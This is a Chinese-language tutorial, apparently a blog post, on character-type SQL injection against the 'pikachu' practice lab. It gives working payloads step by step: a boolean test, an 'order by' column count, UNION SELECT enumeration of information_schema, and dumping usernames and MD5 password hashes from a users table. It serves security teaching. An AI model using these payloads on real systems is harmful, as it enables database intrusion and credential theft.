首先我们要知道字符型和数字型的区别:
当我们输入的是整数并且不需要使用引号闭合时,为数字型,而字符型是当我们输入的内容为字符串类型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。所以字符型的注入是需要使用单引号进行闭合的,然后在后面接上我们的payload。
1、查找注入点
kobe' and 1=1 #
kobe' and 1=2 #
分别输入上面两句,查看结果是否相同,测试是否可注入。
两次结果不同,可进行注入。
2、查询字段数
将kobe'后面的内容改为 order by +个数,进行试验,也可以输入 union select 1,2...这种方式试验,这里我用的是order by 的方式。
kobe' order by 2 #
从1开始实验,不管是order by1 还是2 都是有结果的,当我们输入order by 3时,就有了报错信息。
说明字段数为2,知道字段数是我们渗透必不可少的一步,因为联合查询必须要求前后的列数必须相同,接下来进行联合查询。
3、获取数据库、字段、用户信息等。
kobe' union select database(),user() #
database()是获取当前数据库名,user()是获取当前的用户。
在我们创建数据库后,每个数据库系统中都有一个相同的库(information_schema),里面存在了许多对于我们渗透有用的表,如:SCHEMATA(有我们所有的数据库名)、TABLES(所有的表名)、COLUMNS(所有的列名),我们将会利用这些表中的数据一步步进行渗透。
- 找到所有的数据库(虽然前面我们已经知道了当前数据库,这个是为了能够渗透到其他的数据库)
用union联合查询时一定要注意前后的列数相同,在前面我们知道了字段数为2,那么我们后面的列数也要为2,下面代码中的第一个数字1代表了一列,括号中的select语句整体代表一列。
kobe' union select 1,(select group_concat(schema_name) from information_schema.schemata) #
group_concat()是将所有的数据库名连成一行显示;如果不用group_concat()函数,只能一行一行显示,在select语句最后要加上limit 0,1(从第一行开始取一行也就是第一行)...依次改变,前面的数字,limit1,1代表了取第二行。
得到了所有的数据库名;
- 选择数据库,并爆出该数据库的所有表
通过上面得到的数据库名,选择数据库,利用information_schema库中的TABLES表:
kobe' union select table_name,table_schema from information_schema.tables where table_schema='pikachu' #
每一个内容的第一行为表名;
- 得到表中所有的列
使用COLUMNS表,得到users表中的所有列.
kobe' union select column_name,table_name from information_schema.columns where table_schema='pikachu' and table_name='users' #
where 后面的条件即为选择数据库名和表名,table_schema为数据库名,table_name为表名。
得到所有的列名;
- 利用已知的信息,进行拖库
在前面的几步中,我们已经得到了表名以及列名,利用这些已知条件进行拖库。
kobe' union select username,password from users #
可得到用户的信息,用户名以及密码,这里的密码是用了MD5加密,我们在进行解密时,可以在网上找一个可以MD5解密的网站就可以,密码分别是: 123456 000000 abc123
字符型注入的方法和数字型注入的方法、原理都是一样的,不同的地方在于判断是否需要使用单引号进行闭合。
感谢大家的观看,记得点个小赞赞~